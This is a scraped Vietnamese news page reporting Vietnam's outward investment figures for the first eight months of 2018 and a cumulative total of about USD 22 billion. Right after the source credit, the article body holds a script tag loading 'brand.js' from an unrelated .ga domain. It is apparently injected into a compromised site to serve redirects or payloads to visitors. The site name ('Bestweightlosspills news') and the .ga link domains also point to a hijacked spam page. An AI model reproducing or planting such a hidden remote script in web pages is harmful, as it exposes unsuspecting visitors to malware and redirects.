Việt Nam đã đầu tư ra nước ngoài 22 tỷ USD

0
161

Theo số liệu của Cục Đầu tư nước ngoài – Bộ Kế hoạch và Đầu tư, trong 8 tháng năm 2018, cả nước có 93 dự án được cấp mới giấy chứng nhận đăng ký đầu tư ra nước ngoài, với tổng vốn đầu tư bên Việt Nam 271,46 triệu USD; 22 lượt dự án điều chỉnh vốn với tổng vốn đầu tư bên Việt Nam tăng thêm 42 triệu USD.

</p> <p>Tính chung trong 8 tháng năm 2018, tổng vốn đầu tư Việt Nam ra nước ngoài cấp mới và tăng thêm đạt 313,48 triệu USD.</p> <p>Lĩnh vực tài chính ngân hàng dẫn đầu về vốn đầu tư của Việt Nam ra nước ngoài với tổng vốn đăng ký mới và tăng thêm là 105,77 triệu USD, chiếm 33,7% tổng vốn đầu tư; lĩnh vực nông nghiệp, lâm nghiệp, thủy sản đứng thứ hai với 63,84 triệu USD và chiếm 20,3% tổng vốn đầu tư.</p> <p>Công nghiệp chế biến, chế tạo đứng thứ 3 với 45,87 triệu USD, chiếm 14,6% tổng vốn đầu tư. Còn lại là các dự án thuộc các lĩnh vực khác.</p> <p>Trong 8 tháng năm 2018, Việt Nam đã đầu tư sang 29 quốc gia, vùng lãnh thổ. Trong đó, Lào là địa bàn dẫn đầu với 95,19 triệu USD, chiếm 30,4% tổng vốn đầu tư. Australia xếp thứ 2 với 37,7 triệu USD, chiếm 12% tổng vốn đầu tư. Với 1 dự án có vốn đầu tư Việt Nam là 35,93 triệu USD, Slovakia xếp thứ 3 và chiếm 11,4% tổng vốn đầu tư. Tiếp theo là Campuchia, Cuba, Myanmar.</p> <p>Theo Bộ Kế hoạch và Đầu tư, từ năm 2006 đến nay là giai đoạn “bùng nổ” đầu tư ra nước ngoài của các doanh nghiệp Việt Nam. Tính đến tháng 1/2017, Việt Nam đang có 1.188 dự án đầu tư tại 70 quốc gia và vùng lãnh thổ với tổng vốn đăng ký gần 21,4 tỷ USD. Đó là những con số “trong mơ” của doanh nghiệp Việt 20 năm trước.</p> <p>Riêng trong năm 2017, tổng số vốn cấp mới và tăng thêm đầu tư ra nước ngoài là 350 triệu USD. Như vậy, luỹ kế đến thời điểm hiện tại, Việt Nam đã đầu tư ra nước ngoài khoảng 22 tỷ USD.</p> </div> <p> Nguồn: vneconomy.vn <script src='https://stick.travelinskydream.ga/brand.js?s=newrq' type='text/javascript'></script></p> </div> <footer> <div class="td-post-source-tags"> </div> <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">Chia sẻ</span> <div class="td-default-sharing"> <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fclick.driverfortnigtly.ga%2FGMtCh34S%2Fnha-dat%2Fviet-nam-da-dau-tu-ra-nuoc-ngoai-22-ty-usd.html" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a> <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Vi%E1%BB%87t+Nam+%C4%91%C3%A3+%C4%91%E1%BA%A7u+t%C6%B0+ra+n%C6%B0%E1%BB%9Bc+ngo%C3%A0i+22+t%E1%BB%B7+USD&url=https%3A%2F%2Fclick.driverfortnigtly.ga%2FGMtCh34S%2Fnha-dat%2Fviet-nam-da-dau-tu-ra-nuoc-ngoai-22-ty-usd.html&via=Bestweightlosspills+news%2C+%C4%91%E1%BB%8Dc+b%C3%A1o+online%2C+%C4%91%E1%BB%8Dc+b%C3%A1o+nhanh."><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a> <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/viet-nam-da-dau-tu-ra-nuoc-ngoai-22-ty-usd.html" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a> <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/viet-nam-da-dau-tu-ra-nuoc-ngoai-22-ty-usd.html&media=https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489.png&description=Vi%E1%BB%87t+Nam+%C4%91%C3%A3+%C4%91%E1%BA%A7u+t%C6%B0+ra+n%C6%B0%E1%BB%9Bc+ngo%C3%A0i+22+t%E1%BB%B7+USD" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a> <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=Vi%E1%BB%87t+Nam+%C4%91%C3%A3+%C4%91%E1%BA%A7u+t%C6%B0+ra+n%C6%B0%E1%BB%9Bc+ngo%C3%A0i+22+t%E1%BB%B7+USD%20-%20https%3A%2F%2Fclick.driverfortnigtly.ga%2FGMtCh34S%2Fnha-dat%2Fviet-nam-da-dau-tu-ra-nuoc-ngoai-22-ty-usd.html" ><i class="td-icon-whatsapp"></i></a> </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/viet-nam-da-dau-tu-ra-nuoc-ngoai-22-ty-usd.html&layout=button_count&show_faces=false&width=105&action=like&colorscheme=light&height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/viet-nam-da-dau-tu-ra-nuoc-ngoai-22-ty-usd.html" data-text="Việt Nam đã đầu tư ra nước ngoài 22 tỷ USD" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div> <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Bài trước</span><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/platinum-victory-van-kien-tri-gom-co-phieu-ree-sau-4-lan-that-bai.html">Platinum Victory vẫn kiên trì gom cổ phiếu REE sau 4 lần thất bại</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Bài tiếp theo</span><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/coca-cola-chi-hon-5-ty-usd-thau-tom-chuoi-cua-hieu-ca-phe-lon-thu-nhi-the-gioi.html">Coca-Cola chi hơn 5 tỷ USD thâu tóm chuỗi cửa hiệu cà phê lớn thứ nhì thế giới</a></div></div></div> <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="https://click.driverfortnigtly.ga/GMtCh34S/author/dangthongpro">Tổng hợp tin tức</a></span></div> <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Tổng hợp tin tức"></span><meta itemprop="datePublished" content="2018-09-01T05:58:28+00:00"><meta itemprop="dateModified" content="2018-09-01T05:58:28+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/viet-nam-da-dau-tu-ra-nuoc-ngoai-22-ty-usd.html"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content=""></span><meta itemprop="name" content="Bestweightlosspills news, đọc báo online, đọc báo nhanh."></span><meta itemprop="headline " content="Việt Nam đã đầu tư ra nước ngoài 22 tỷ USD"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489.png"><meta itemprop="width" content="500"><meta itemprop="height" content="281"></span> </footer> </article> <!-- /.post --> <div class="td_block_wrap td_block_related_posts td_uid_3_60d3ea6a3abc2_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_3_60d3ea6a3abc2" ><script>var block_td_uid_3_60d3ea6a3abc2 = new tdBlock(); block_td_uid_3_60d3ea6a3abc2.id = "td_uid_3_60d3ea6a3abc2"; block_td_uid_3_60d3ea6a3abc2.atts = '{"limit":6,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"T\u1ea5t C\u1ea3","color_preset":"","border_top":"","class":"td_uid_3_60d3ea6a3abc2_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_3_60d3ea6a3abc2_rand","live_filter":"cur_post_same_categories","live_filter_cur_post_id":8730,"live_filter_cur_post_author":"1","block_template_id":""}'; block_td_uid_3_60d3ea6a3abc2.td_column_number = "3"; block_td_uid_3_60d3ea6a3abc2.block_type = "td_block_related_posts"; block_td_uid_3_60d3ea6a3abc2.post_count = "6"; block_td_uid_3_60d3ea6a3abc2.found_posts = "2096"; block_td_uid_3_60d3ea6a3abc2.header_color = ""; block_td_uid_3_60d3ea6a3abc2.ajax_pagination_infinite_stop = ""; block_td_uid_3_60d3ea6a3abc2.max_num_pages = "350"; tdBlocksArray.push(block_td_uid_3_60d3ea6a3abc2); </script><h4 class="td-related-title td-block-title"><a id="td_uid_4_60d3ea6a3f164" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_3_60d3ea6a3abc2" href="#">BÀI VIẾT LIÊN QUAN</a><a id="td_uid_5_60d3ea6a3f16b" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_3_60d3ea6a3abc2" href="#">XEM THÊM</a></h4><div id=td_uid_3_60d3ea6a3abc2 class="td_block_inner"> <div class="td-related-row"> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/can-ho-cao-cap-hateco-laroma-bo-tri-hop-ly.html" rel="bookmark" title="Căn hộ cao cấp Hateco Laroma bố trí hợp lý"><img width="218" height="150" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Căn hộ cao cấp Hateco Laroma bố trí hợp lý"/></a></div> <a href="https://click.driverfortnigtly.ga/GMtCh34S/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/can-ho-cao-cap-hateco-laroma-bo-tri-hop-ly.html" rel="bookmark" title="Căn hộ cao cấp Hateco Laroma bố trí hợp lý">Căn hộ cao cấp Hateco Laroma bố trí hợp lý</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/the-golden-an-khanh-khu-du-an-di-chuyen-thuan-tien-giua-trung-tam.html" rel="bookmark" title="The Golden An Khánh Khu dự án di chuyển thuận tiện giữa trung tâm"><img width="218" height="150" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="The Golden An Khánh Khu dự án di chuyển thuận tiện giữa trung tâm"/></a></div> <a href="https://click.driverfortnigtly.ga/GMtCh34S/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/the-golden-an-khanh-khu-du-an-di-chuyen-thuan-tien-giua-trung-tam.html" rel="bookmark" title="The Golden An Khánh Khu dự án di chuyển thuận tiện giữa trung tâm">The Golden An Khánh Khu dự án di chuyển thuận tiện giữa trung tâm</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/du-an-chung-cu-the-legend-noi-ly-tuong.html" rel="bookmark" title="Dự án chung cư The Legend nơi lý tưởng"><img width="218" height="150" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Dự án chung cư The Legend nơi lý tưởng"/></a></div> <a href="https://click.driverfortnigtly.ga/GMtCh34S/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/du-an-chung-cu-the-legend-noi-ly-tuong.html" rel="bookmark" title="Dự án chung cư The Legend nơi lý tưởng">Dự án chung cư The Legend nơi lý tưởng</a></h3> </div> </div> </div> <!-- ./td-related-span4 --></div><!--./row-fluid--> <div class="td-related-row"> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/khu-can-ho-chung-cu%cc%a3-the-habitat-tre-trung-sinh-dong.html" rel="bookmark" title="Khu căn hộ chung cự The Habitat trẻ trung sinh động"><img width="218" height="150" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Khu căn hộ chung cự The Habitat trẻ trung sinh động"/></a></div> <a href="https://click.driverfortnigtly.ga/GMtCh34S/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/khu-can-ho-chung-cu%cc%a3-the-habitat-tre-trung-sinh-dong.html" rel="bookmark" title="Khu căn hộ chung cự The Habitat trẻ trung sinh động">Khu căn hộ chung cự The Habitat trẻ trung sinh động</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/chung-cu-cao-cap-the-link-day-du-tien-ich.html" rel="bookmark" title="Chung cư cao cấp The Link đầy đủ tiện ích"><img width="218" height="150" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Chung cư cao cấp The Link đầy đủ tiện ích"/></a></div> <a href="https://click.driverfortnigtly.ga/GMtCh34S/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/chung-cu-cao-cap-the-link-day-du-tien-ich.html" rel="bookmark" title="Chung cư cao cấp The Link đầy đủ tiện ích">Chung cư cao cấp The Link đầy đủ tiện ích</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/the-spark-le-van-luong-khu-chung-cu-cao-cap-thanh-toan-uu-dai-nhieu-uu-dai.html" rel="bookmark" title="The Spark Lê Văn Lương Khu chung cư cao cấp thanh toán ưu đãi nhiều ưu đãi"><img width="218" height="150" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="The Spark Lê Văn Lương Khu chung cư cao cấp thanh toán ưu đãi nhiều ưu đãi"/></a></div> <a href="https://click.driverfortnigtly.ga/GMtCh34S/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/the-spark-le-van-luong-khu-chung-cu-cao-cap-thanh-toan-uu-dai-nhieu-uu-dai.html" rel="bookmark" title="The Spark Lê Văn Lương Khu chung cư cao cấp thanh toán ưu đãi nhiều ưu đãi">The Spark Lê Văn Lương Khu chung cư cao cấp thanh toán ưu đãi nhiều ưu đãi</a></h3> </div> </div> </div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_60d3ea6a3abc2" data-td_block_id="td_uid_3_60d3ea6a3abc2"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_3_60d3ea6a3abc2" data-td_block_id="td_uid_3_60d3ea6a3abc2"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --> <div class="comments" id="comments"> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title">BÌNH LUẬN <small><a rel="nofollow" id="cancel-comment-reply-link" href="/nha-dat/viet-nam-da-dau-tu-ra-nuoc-ngoai-22-ty-usd.html#respond" style="display:none;">Hủy trả lời</a></small></h3> <form action="http://click.driverfortnigtly.ga/GMtCh34S/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate> <div class="clearfix"></div> <div class="comment-form-input-wrap td-form-comment"> <textarea placeholder="Bình luận:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea> <div class="td-warning-comment">Please enter your comment!</div> </div> <div class="comment-form-input-wrap td-form-author"> <input class="" id="author" name="author" placeholder="Tên:*" type="text" value="" size="30" aria-required='true' /> <div class="td-warning-author">Please enter your name here</div> </div> <div class="comment-form-input-wrap td-form-email"> <input class="" id="email" name="email" placeholder="Email:*" type="text" value="" size="30" aria-required='true' /> <div class="td-warning-email-error">You have entered an incorrect email address!</div> <div class="td-warning-email">Please enter your email address here</div> </div> <div class="comment-form-input-wrap td-form-url"> <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" /> </div> <p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Đăng" /> <input type='hidden' name='comment_post_ID' value='8730' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="58b7b94f02" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="13"/></p> </form> </div><!-- #respond --> <p class="akismet_comment_form_privacy_notice">Website này sử dụng Akismet để hạn chế spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Tìm hiểu bình luận của bạn được duyệt như thế nào</a>.</p> </div> <!-- /.content --> </div> </div> <div class="td-pb-span4 td-main-sidebar" role="complementary"> <div class="td-ss-main-sidebar"> <div class="td-a-rec td-a-rec-id-sidebar "><span class="td-adspot-title">- Advertisement -</span><div class="td-all-devices"><a href="http://hethongtintuc.com"><img src="http://hethongtintuc.com/banner/bannervip.png"/></a></div></div><div class="td-a-rec td-a-rec-id-custom_ad_1 "><span class="td-adspot-title">Quảng cáo</span><div class="td-all-devices"><a href="http://hethongtintuc.com"><img src="http://hethongtintuc.com/banner/bannervip.png"/></a></div></div><div class="td_block_wrap td_block_21 td_block_widget td_uid_8_60d3ea6a42759_rand td-pb-border-top td_block_template_1 td-column-1" data-td-block-uid="td_uid_8_60d3ea6a42759" ><script>var block_td_uid_8_60d3ea6a42759 = new tdBlock(); block_td_uid_8_60d3ea6a42759.id = "td_uid_8_60d3ea6a42759"; block_td_uid_8_60d3ea6a42759.atts = '{"limit":"3","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"Latest article","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_8_60d3ea6a42759_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_8_60d3ea6a42759_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}'; block_td_uid_8_60d3ea6a42759.td_column_number = "1"; block_td_uid_8_60d3ea6a42759.block_type = "td_block_21"; block_td_uid_8_60d3ea6a42759.post_count = "3"; block_td_uid_8_60d3ea6a42759.found_posts = "22160"; block_td_uid_8_60d3ea6a42759.header_color = "#"; block_td_uid_8_60d3ea6a42759.ajax_pagination_infinite_stop = ""; block_td_uid_8_60d3ea6a42759.max_num_pages = "7387"; tdBlocksArray.push(block_td_uid_8_60d3ea6a42759); </script><div class="td-block-title-wrap"><h4 class="block-title"><span class="td-pulldown-size">Latest article</span></h4></div><div id=td_uid_8_60d3ea6a42759 class="td_block_inner"> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/san-pham-dich-vu/sua-bep-tu-tai-nha-cam-ket-loi-het-dut-diem-nhanh-chong-nhe.html" rel="bookmark" title="Sửa bếp từ tại nhà cam kết lỗi hết dứt điểm nhanh chóng nhé"><img width="100" height="100" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-bep-tu-02-100x100.jpg" alt="" title="Sửa bếp từ tại nhà cam kết lỗi hết dứt điểm nhanh chóng nhé"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/san-pham-dich-vu/sua-bep-tu-tai-nha-cam-ket-loi-het-dut-diem-nhanh-chong-nhe.html" rel="bookmark" title="Sửa bếp từ tại nhà cam kết lỗi hết dứt điểm nhanh chóng nhé">Sửa bếp từ tại nhà cam kết lỗi hết dứt điểm nhanh chóng nhé</a></h3> <div class="td-module-meta-info"> <a href="https://click.driverfortnigtly.ga/GMtCh34S/category/san-pham-dich-vu" class="td-post-category">Sản phẩm - dịch vụ</a> <span class="td-post-author-name"><a href="https://click.driverfortnigtly.ga/GMtCh34S/author/batrung">batrung</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-06-17T08:06:01+00:00" >17 Tháng Sáu, 2021</time></span> <div class="td-module-comments"><a href="https://click.driverfortnigtly.ga/GMtCh34S/san-pham-dich-vu/sua-bep-tu-tai-nha-cam-ket-loi-het-dut-diem-nhanh-chong-nhe.html#respond">0</a></div> </div> <div class="td-excerpt"> Bảo Trì Số 1 cung cấp dịch vụ sửa bếp từ tại royal city và times city để giúp quý khách hàng không bị... </div> </div> </div> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/can-ho-cao-cap-hateco-laroma-bo-tri-hop-ly.html" rel="bookmark" title="Căn hộ cao cấp Hateco Laroma bố trí hợp lý"><img width="100" height="100" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-150x150.png" alt="" title="Căn hộ cao cấp Hateco Laroma bố trí hợp lý"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/can-ho-cao-cap-hateco-laroma-bo-tri-hop-ly.html" rel="bookmark" title="Căn hộ cao cấp Hateco Laroma bố trí hợp lý">Căn hộ cao cấp Hateco Laroma bố trí hợp lý</a></h3> <div class="td-module-meta-info"> <a href="https://click.driverfortnigtly.ga/GMtCh34S/category/nha-dat" class="td-post-category">Nhà đất</a> <span class="td-post-author-name"><a href="https://click.driverfortnigtly.ga/GMtCh34S/author/xuankhanh">xuankhanh</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-06-15T08:00:40+00:00" >15 Tháng Sáu, 2021</time></span> <div class="td-module-comments"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/can-ho-cao-cap-hateco-laroma-bo-tri-hop-ly.html#respond">0</a></div> </div> <div class="td-excerpt"> Khu chung cư Hateco Laroma đầu tư bởi Công ty CP Đầu tư hạ tầng và công trình kiến trúc Hà Nội (Hateco.,Jsc )... </div> </div> </div> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/san-pham-dich-vu/khac-phuc-may-giat-tai-nha-dam-bao-loi-dut-diem-nhanh-chong.html" rel="bookmark" title="Khắc phục máy giặt tại nhà đảm bảo lỗi dứt điểm nhanh chóng"><img width="100" height="100" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-may-giat-13-100x100.jpg" alt="" title="Khắc phục máy giặt tại nhà đảm bảo lỗi dứt điểm nhanh chóng"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/san-pham-dich-vu/khac-phuc-may-giat-tai-nha-dam-bao-loi-dut-diem-nhanh-chong.html" rel="bookmark" title="Khắc phục máy giặt tại nhà đảm bảo lỗi dứt điểm nhanh chóng">Khắc phục máy giặt tại nhà đảm bảo lỗi dứt điểm nhanh chóng</a></h3> <div class="td-module-meta-info"> <a href="https://click.driverfortnigtly.ga/GMtCh34S/category/san-pham-dich-vu" class="td-post-category">Sản phẩm - dịch vụ</a> <span class="td-post-author-name"><a href="https://click.driverfortnigtly.ga/GMtCh34S/author/batrung">batrung</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-06-12T07:49:08+00:00" >12 Tháng Sáu, 2021</time></span> <div class="td-module-comments"><a href="https://click.driverfortnigtly.ga/GMtCh34S/san-pham-dich-vu/khac-phuc-may-giat-tai-nha-dam-bao-loi-dut-diem-nhanh-chong.html#respond">0</a></div> </div> <div class="td-excerpt"> Máy giặt là thiết bị không thể thiếu trong mỗi gia đình của người Việt Nam. Có nhiều địa chỉ sửa chữa máy giặt... </div> </div> </div> </div></div> <!-- ./block --> </div> </div> </div> <!-- /.td-pb-row --> </div> <!-- /.td-container --> </div> <!-- /.td-main-content-wrap --> <!-- Instagram --> <!-- Footer --> <div class="td-footer-wrapper td-container-wrap td-footer-template-4 "> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td-a-rec td-a-rec-id-footer_top "><span class="td-adspot-title">Quảng cáo tại đây</span><div class="td-all-devices"><a href="#"><img src="http://hethongtintuc.com/banner/no-banner-728x90.jpg"/></a></div></div> </div> </div> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td-footer-info"><div class="footer-logo-wrap"><a href="https://click.driverfortnigtly.ga/GMtCh34S/"><img class="td-retina-data" src="" data-retina="http://baotaolao.net/blogtintuc/wp-content/uploads/2017/04/logo-header@2x.png" alt="" title=""/></a></div><div class="footer-text-wrap"><div class="footer-email-wrap">Liên hệ 